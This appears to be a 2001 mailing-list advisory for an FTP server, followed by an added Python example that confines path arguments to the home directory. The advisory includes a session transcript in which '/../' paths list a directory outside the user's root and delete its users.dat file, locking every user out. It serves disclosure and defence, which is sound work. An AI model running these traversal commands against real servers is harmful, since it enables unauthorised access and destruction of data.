From: se00020LION.CC
Date: Sat Mar 03 2001 - 12:56:23 CST


    Vulnerability:

    Users can break out of their root directory and list
    directories.
    Depending on the privileges you have, other commands
    such as delete may be executed outside of the home
    directory.

    e:\crap\ was used as the home directory.
    Deleting files in e:\crap is enabled.

    Detail:

    Problem: Again relative paths.

    dir:
    Lists directories outside of the root dir.
    Risk: medium-high

    230 User test logged in.
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
    -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
    -rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
    drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
    226 File sent ok
    FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
    ftp> cd ..
    550 CWD failed. ..: No permission

    ftp> dir /../experimental/broker/data/
    200 Port command successful.
    150 Opening data connection for directory list.
    -rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
    -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
    -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
    -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
    -rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
    -rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
    -rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
    -rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
    -rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat
    226 File sent ok
    FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s

    delete:
    deleting files outside of root dir.

    ftp> delete /../experimental/broker/data/users.dat
    250 File '/../experimental/broker/data/users.dat' deleted.
    ftp> quit
    221-Thank you for your visit.
    221-
    221 Goodbye.

    C:\>ftp 10.17.3.44
    Verbindung mit 10.17.3.44 wurde hergestellt.
    220 FTP Server ready [***]
    Benutzer (10.17.3.44:(none)): test
    331 Password required for test.
    Kennwort:
    530 Login incorrect.
    Anmeldung fehlgeschlagen.
    ftp> :(

    By deleting users.dat, no one will be able to log on ...

    put/get commands seem to be secure...

    This was tested with Win2k and the trial version of broker
    ver. 5.0

    se00020fhs-hagenberg.ac.at or
    se00020lion.cc
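
In the session above `cd ..` was refused while `dir` and `delete` accepted a `/../` argument. As an added example (not part of the original post and not the vendor's code), this is one way a server can resolve every path argument against the home directory before touching the file system; the function names are hypothetical and `e:\crap` is the home directory named in the post.

```python
import ntpath
import posixpath

class PathEscape(Exception):
    """Client path resolves outside the user's home directory."""

def resolve_in_home(home, cwd, client_path):
    # home: real home directory; cwd: current virtual directory ("/" is home);
    # client_path: argument of LIST, DELE, CWD, ... exactly as the client sent it.
    virtual = client_path.replace("\\", "/")  # accept both separators
    # Drive letters, alternate data streams and NUL bytes are never valid here.
    if ":" in virtual or "\x00" in virtual:
        raise PathEscape(client_path)
    # An absolute argument replaces cwd, a relative one is appended to it.
    joined = posixpath.join(cwd, virtual)
    parts = []
    for part in joined.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not parts:          # would climb above the virtual root
                raise PathEscape(client_path)
            parts.pop()
        elif part != part.rstrip(". "):
            # Win32 drops trailing dots and spaces, so ".. " would act as "..".
            raise PathEscape(client_path)
        else:
            parts.append(part)
    real_home = ntpath.normpath(home)
    real = ntpath.normpath(ntpath.join(real_home, *parts))
    # Defence in depth: the mapped path must still sit under the home directory.
    if ntpath.normcase(ntpath.commonpath([real_home, real])) != ntpath.normcase(real_home):
        raise PathEscape(client_path)
    return real

def allowed(home, cwd, client_path):
    """True if the argument stays inside home; use for every path-taking command."""
    try:
        resolve_in_home(home, cwd, client_path)
        return True
    except PathEscape:
        return False

if __name__ == "__main__":
    HOME = r"e:\crap"  # home directory named in the post
    for arg in ["test", "/../experimental/broker/data/", "/test/../huhu"]:
        print(arg, "->", allowed(HOME, "/", arg))
```

This check is purely lexical; a real server should also resolve junctions and symbolic links (for example with `os.path.realpath`) before the final comparison.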